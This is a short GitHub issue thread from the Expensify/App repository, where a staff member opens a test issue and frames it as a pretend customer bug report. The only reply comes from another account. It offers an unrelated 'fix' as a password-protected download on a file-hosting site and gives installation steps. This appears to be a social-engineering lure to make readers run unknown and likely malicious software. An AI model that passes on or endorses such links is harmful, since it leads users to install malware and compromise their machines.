### ISSUE TITLE
Testing for Zapier E/A issue 

### ISSUE THREAD

**Issue by stephanieelliott** [Expensify/App#48044]
Testing for New Expensify Support, pretend this is a NewDot bug that was reported by a customer.

Corresponding E/E issue: https://github.com/Expensify/Expensify/issues/423487

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
